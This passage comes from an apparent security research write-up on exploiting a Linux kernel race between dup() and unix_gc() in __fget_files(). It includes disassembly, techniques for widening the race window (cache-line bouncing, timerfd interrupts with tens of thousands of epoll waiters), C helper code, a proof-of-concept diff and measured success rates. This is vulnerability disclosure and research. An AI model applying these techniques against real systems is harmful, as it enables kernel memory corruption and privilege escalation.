In the Debian 5.10.0-9-amd64 kernel at version 5.10.70-1, that race window looks as follows:

<__fget_files+0x1e> cmp    r10,rax

<__fget_files+0x21> sbb    rax,rax

<__fget_files+0x24> mov    rdx,QWORD PTR [r11+0x8]

<__fget_files+0x28> and    eax,r8d

<__fget_files+0x2b> lea    rax,[rdx+rax*8]

<__fget_files+0x2f> mov    r12,QWORD PTR [rax] ; RACE WINDOW START

; r12 now contains file*

<__fget_files+0x32> test   r12,r12

<__fget_files+0x35> je     ffffffff812e3df7 <__fget_files+0x77>

<__fget_files+0x37> mov    eax,r9d

<__fget_files+0x3a> and    eax,DWORD PTR [r12+0x44] ; LOAD (for ->f_mode)

<__fget_files+0x3f> jne    ffffffff812e3df7 <__fget_files+0x77>

<__fget_files+0x41> mov    rax,QWORD PTR [r12+0x38] ; LOAD (for ->f_count)

<__fget_files+0x46> lea    rdx,[r12+0x38]

<__fget_files+0x4b> test   rax,rax

<__fget_files+0x4e> je     ffffffff812e3def <__fget_files+0x6f>

<__fget_files+0x50> lea    rcx,[rsi+rax*1]

<__fget_files+0x54> lock cmpxchg QWORD PTR [rdx],rcx ; RACE WINDOW END (on cmpxchg success)

As you can see, the race window is fairly small - around 12 instructions, assuming that the cmpxchg succeeds.

Missing some cache

Luckily for us, the race window contains the first few memory accesses to the struct file; therefore, by making sure that the struct file is not present in the fastest CPU caches, we can widen the race window by as much time as the memory accesses take. The standard way to do this is to use an eviction pattern / eviction set; but instead we can also make the cache line dirty on another core (see Anders Fogh's blogpost for more detail). (I'm not actually sure about the intricacies of how much latency this adds on different manufacturers' CPU cores, or on different CPU generations - I've only tested different versions of my proof-of-concept on Intel Skylake and Tiger Lake. Differences in cache coherency protocols or snooping might make a big difference.)

For the cache line containing the flags and refcount of a struct file, this can be done by, on another CPU, temporarily bumping its refcount up and then changing it back down, e.g. with close(dup(fd)) (or just by accessing the FD in pretty much any way from a multithreaded process).

However, when we're trying to hit the race in __fget_files() via dup(), we don't want any cache misses to occur before we hit the race window - that would slow us down and probably make us miss the race. To prevent that from happening, we can call dup() with a different FD number for a warm-up run shortly before attempting the race. Because we also want the relevant cache line in the FD table to be hot, we should choose the FD number for the warm-up run such that it uses the same cache line of the file descriptor table.
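
A minimal sketch of these two preparation steps, not the code from my proof-of-concept. It assumes 64-byte cache lines, 8-byte FD table entries and a cache-line-aligned FD array (so 8 FD slots share a line). All helper names are hypothetical, and pinning threads to specific cores is left to the caller:

```c
#include <unistd.h>

/* Assumption: 64-byte cache lines and 8-byte struct file pointers,
 * i.e. 8 FD table slots per line, with the array cache-line aligned. */
#define FDS_PER_CACHE_LINE 8

/* Hypothetical helper: do two FD numbers share an FD table cache line? */
static int same_fdtable_line(int fd_a, int fd_b)
{
    return fd_a / FDS_PER_CACHE_LINE == fd_b / FDS_PER_CACHE_LINE;
}

/* Hypothetical helper: pick a different FD number whose FD table slot
 * shares a cache line with victim_fd's slot. Flipping only the lowest
 * bit keeps the FD inside the same aligned group of 8. */
static int pick_warmup_fd(int victim_fd)
{
    return victim_fd ^ 1;
}

/* Meant to run on a different CPU than the racing thread: taking and
 * dropping a reference writes to f_count, which leaves the struct file's
 * cache line dirty on that other CPU. */
static int bounce_file_refcount(int victim_fd)
{
    int tmp = dup(victim_fd);
    if (tmp < 0)
        return -1;
    return close(tmp);
}

/* Meant to run on the racing CPU shortly before the real attempt:
 * exercises the dup() code path and the FD table cache line without
 * touching the victim file. warmup_fd must refer to some other open file. */
static int warm_up_dup_path(int warmup_fd)
{
    int tmp = dup(warmup_fd);
    if (tmp < 0)
        return -1;
    return close(tmp);
}
```

The caller would open an unrelated file at the FD number returned by pick_warmup_fd() (for example with dup2()) before starting race attempts.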

An interruption

Okay, a cache miss might be something like a few dozen or maybe hundred nanoseconds or so - that's better, but it's not great. What else can we do to make this tiny piece of code much slower to execute?

On Android, kernels normally set CONFIG_PREEMPT, which would've allowed abusing the scheduler to somehow interrupt the execution of this code. The way I've done this in the past was to give the victim thread a low scheduler priority and pin it to a specific CPU core together with another high-priority thread that is blocked on a read() syscall on an empty pipe (or eventfd); when data is written to the pipe from another CPU core, the pipe becomes readable, so the high-priority thread (which is registered on the pipe's waitqueue) becomes schedulable, and an inter-processor interrupt (IPI) is sent to the victim's CPU core to force it to enter the scheduler immediately.

One problem with that approach, aside from its reliance on CONFIG_PREEMPT, is that any timing variability in the kernel code involved in sending the IPI makes it harder to actually preempt the victim thread in the right spot.

(Thanks to the Xen security team - I think the first time I heard the idea of using an interrupt to widen a race window might have been from them.)

Setting an alarm

A better way to do this on an Android phone would be to trigger the scheduler not from an IPI, but from an expiring high-resolution timer on the same core, although I didn't get it to work (probably because my code was broken in unrelated ways).

High-resolution timers (hrtimers) are exposed through many userspace APIs. Even the timeout of select()/pselect() uses an hrtimer, although this is an hrtimer that normally has some slack applied to it to allow batching it with timers that are scheduled to expire a bit later. An example of a non-hrtimer-based API is the timeout used for reading from a UNIX domain socket (and probably also other types of sockets?), which can be set via SO_RCVTIMEO.

The thing that makes hrtimers "high-resolution" is that they don't just wait for the next periodic clock tick to arrive; instead, the expiration time of the next hrtimer on the CPU core is programmed into a hardware timer. So we could set an absolute hrtimer for some time in the future via something like timer_settime() or timerfd_settime(), and then at exactly the programmed time, the hardware will raise an interrupt! We've made the timing behavior of the OS irrelevant for the second side of the race; the only thing that matters is the hardware! Or... well, almost...

[Sidenote] Absolute timers: Not quite absolute

So we pick some absolute time at which we want to be interrupted, and tell the kernel using a syscall that accepts an absolute time, in nanoseconds. And then when that timer is the next one scheduled, the OS converts the absolute time to whatever clock base/scale the hardware timer is based on, and programs it into hardware. And the hardware usually supports programming timers with absolute time - e.g. on modern X86 (with X86_FEATURE_TSC_DEADLINE_TIMER), you can simply write an absolute Time Stamp Counter (TSC) deadline into MSR_IA32_TSC_DEADLINE, and when that deadline is reached, you get an interrupt. The situation on arm64 is similar, using the timer's comparator register (CVAL).

However, on both X86 and arm64, even though the clockevent subsystem is theoretically able to give absolute timestamps to clockevent drivers (via ->set_next_ktime()), the drivers instead only implement ->set_next_event(), which takes a relative time as argument. This means that the absolute timestamp has to be converted into a relative one, only to be converted back to absolute a short moment later. The delay between those two operations is essentially added to the timer's expiration time.
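
To make the effect of that round trip concrete, here is a toy model in C. It is not kernel code: the function and parameter names are made up for illustration, and all values are plain nanosecond counts on one shared clock:

```c
#include <stdint.h>

/* Toy model of the absolute -> relative -> absolute round trip.
 * now_at_conversion_ns:  clock value when the deadline is made relative
 * now_at_programming_ns: clock value when the driver turns the relative
 *                        value back into an absolute hardware deadline */
static int64_t programmed_expiry_ns(int64_t abs_deadline_ns,
                                    int64_t now_at_conversion_ns,
                                    int64_t now_at_programming_ns)
{
    /* What a ->set_next_event()-style interface receives. */
    int64_t relative_ns = abs_deadline_ns - now_at_conversion_ns;

    /* What ends up in the hardware comparator. */
    return now_at_programming_ns + relative_ns;
}
```

If 150 ns pass between the two steps, programmed_expiry_ns(1000000, 900000, 900150) yields 1000150: the hardware fires 150 ns after the requested deadline.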

Luckily this didn't really seem to be a problem for me; if it was, I would have tried to repeatedly call timerfd_settime() shortly before the planned expiry time to ensure that the last time the hardware timer is programmed, the relevant code path is hot in the caches. (I did do some experimentation on arm64, where this seemed to maybe help a tiny bit, but I didn't really analyze it properly.)

A really big list of things to do

Okay, so all the stuff I said above would be helpful on an Android phone with CONFIG_PREEMPT, but what if we're trying to target a normal desktop/server kernel that doesn't have that turned on?

Well, we can still trigger hrtimer interrupts the same way - we just can't use them to immediately enter the scheduler and preempt the thread anymore. But instead of using the interrupt for preemption, we could just try to make the interrupt handler run for a really long time.

Linux has the concept of a "timerfd", which is a file descriptor that refers to a timer. You can e.g. call read() on a timerfd, and that operation will block until the timer has expired. Or you can monitor the timerfd using epoll, and it will show up as readable when the timer expires.

When a timerfd becomes ready, all the timerfd's waiters (including epoll watches), which are queued up in a linked list, are woken up via the wake_up() path - just like when e.g. a pipe becomes readable. Therefore, if we can make the list of waiters really long, the interrupt handler will have to spend a lot of time iterating over that list.

And for any waitqueue that is wired up to a file descriptor, it is fairly easy to add a ton of entries thanks to epoll. Epoll ties its watches to specific FD numbers, so if you duplicate an FD with hundreds of dup() calls, you can then use a single epoll instance to install hundreds of waiters on the file. Additionally, a single process can have lots of epoll instances. I used 500 epoll instances and 100 duplicate FDs, resulting in 50 000 waitqueue items.
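
A sketch of how such a pile of waiters could be installed, under the assumption that every successful EPOLL_CTL_ADD contributes one waitqueue entry. The function name is hypothetical, and error handling is kept minimal (FDs are leaked on failure):

```c
#include <stdlib.h>
#include <sys/epoll.h>
#include <unistd.h>

/* Install n_epoll * n_dups epoll watches on the file behind fd.
 * Returns the number of watches installed, or -1 on error.
 * The epoll instances and duplicate FDs are deliberately left open:
 * closing them would remove the watches again. */
static long install_waiters(int fd, int n_epoll, int n_dups)
{
    long installed = 0;
    int *dups = malloc(sizeof(int) * (size_t)n_dups);
    if (!dups)
        return -1;

    /* Each duplicate is a distinct FD number for the same struct file. */
    for (int i = 0; i < n_dups; i++) {
        dups[i] = dup(fd);
        if (dups[i] < 0) {
            free(dups);
            return -1;
        }
    }

    /* Every epoll instance watches every duplicate FD. */
    for (int e = 0; e < n_epoll; e++) {
        int epfd = epoll_create1(0);
        if (epfd < 0) {
            free(dups);
            return -1;
        }
        for (int i = 0; i < n_dups; i++) {
            struct epoll_event ev = { .events = EPOLLIN };
            ev.data.fd = dups[i];
            if (epoll_ctl(epfd, EPOLL_CTL_ADD, dups[i], &ev) < 0) {
                free(dups);
                return -1;
            }
            installed++;
        }
    }

    free(dups);
    return installed;
}
```

With the numbers above, install_waiters(timer_fd, 500, 100) would need about 600 file descriptors, which fits under a typical 1024-FD limit.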

Measuring race outcomes

A nice aspect of this race condition is that if you only hit the difficult race (close() the FD and run unix_gc() while dup() is preempted between FD table lookup and refcount increment), no memory corruption happens yet, but you can observe that the GC has incorrectly removed a socket buffer (SKB) from the victim socket. Even better, if the race fails, you can also see in which direction it failed, as long as no FDs below the victim FD are unused:

  • If dup() returns -1, it was called too late / the interrupt happened too soon: The file* was already gone from the FD table when __fget_files() tried to load it.
  • If dup() returns a file descriptor:
      • If it returns an FD higher than the victim FD, this implies that the victim FD was only closed after dup() had already elevated the refcount and allocated a new FD. This means dup() was called too soon / the interrupt happened too late.
      • If it returns the old victim FD number:
          • If recvmsg() on the FD returned by dup() returns no data, it means the race succeeded: The GC wrongly removed the queued SKB.
          • If recvmsg() returns data, the interrupt happened between the refcount increment and the allocation of a new FD. dup() was called a little bit too soon / the interrupt happened a little bit too late.
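
The decision tree above can be written down as a small classifier. This is only a sketch with made-up names; it assumes, as stated above, that no FD numbers below the victim FD are unused:

```c
/* Possible results of a single race attempt. */
enum race_outcome {
    RACE_DUP_TOO_LATE,       /* dup() failed: file* already gone from FD table */
    RACE_DUP_TOO_EARLY,      /* dup() got a higher FD: refcount bumped before close() */
    RACE_DUP_SLIGHTLY_EARLY, /* victim FD number reused, but the SKB is still queued */
    RACE_SUCCESS,            /* victim FD number reused and the GC removed the SKB */
};

/* dup_ret:       return value of the racing dup() call
 * victim_fd:     FD number that was closed during the race
 * recv_got_data: nonzero if recvmsg() on dup_ret returned data */
static enum race_outcome classify_race(int dup_ret, int victim_fd,
                                       int recv_got_data)
{
    if (dup_ret < 0)
        return RACE_DUP_TOO_LATE;
    if (dup_ret > victim_fd)
        return RACE_DUP_TOO_EARLY;
    /* dup_ret == victim_fd here, given that all lower FDs are in use. */
    return recv_got_data ? RACE_DUP_SLIGHTLY_EARLY : RACE_SUCCESS;
}
```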

Based on this, I repeatedly tested different timing offsets, using a spinloop with a variable number of iterations to skew the timing, and plotted what outcomes the race attempts had depending on the timing skew.

Results: Debian kernel, on Tiger Lake

I tested this on a Tiger Lake laptop, with the same kernel as shown in the disassembly. Note that "0" on the X axis is offset -300 ns relative to the timer's programmed expiry.

This graph shows histograms of race attempt outcomes (too early, success, or too late), with the timing offset at which the outcome occurred on the X axis. The graph shows that depending on the timing offset, up to around 1/3 of race attempts succeeded.

Results: Other kernel, on Skylake

This graph shows similar histograms for a Skylake processor. The exact distribution is different, but again, depending on the timing offset, around 1/3 of race attempts succeeded.

These measurements are from an older laptop with a Skylake CPU, running a different kernel from the one shown above (I don't think that makes a difference). Here "0" on the X axis is offset -1 us relative to the timer.

The exact timings of course look different between CPUs, and they probably also change based on CPU frequency scaling? But still, if you know what the right timing is (or measure the machine's timing before attempting to actually exploit the bug), you could hit this narrow race with a success rate of about 30%!

How important is the cache miss?

The previous section showed that with the right timing, the race succeeds with a probability around 30% - but it doesn't show whether the cache miss is actually important for that, or whether the race would still work fine without it. To verify that, I patched my test code to try to make the file's cache line hot (present in the cache) instead of cold (not present in the cache):

@@ -312,8 +312,10 @@



+#if 0

     // bounce socket's file refcount over to other cpu






     //printf("setting timer\n");

@@ -352,5 +354,5 @@


     while (ts_is_in_future(spin_stop))

-      close(SYSCHK(dup(FAKE_RESURRECT_FD)));

+      close(SYSCHK(dup(RESURRECT_FD)));

     while (ts_is_in_future(my_launch_ts)) /*spin*/;

With that patch, the race outcomes look like this on the Tiger Lake laptop:

This graph is a histogram of race outcomes depending on timing offset; it looks similar to the previous graphs, except that almost no race attempts succeed anymore.

But wait, those graphs make no sense!

If you've been paying attention, you may have noticed that the timing graphs I've been showing are really weird. If we were deterministically hitting the race in exactly the same way every time, the timing graph should look like this (looking just at the "too-early" and "too-late" cases for simplicity):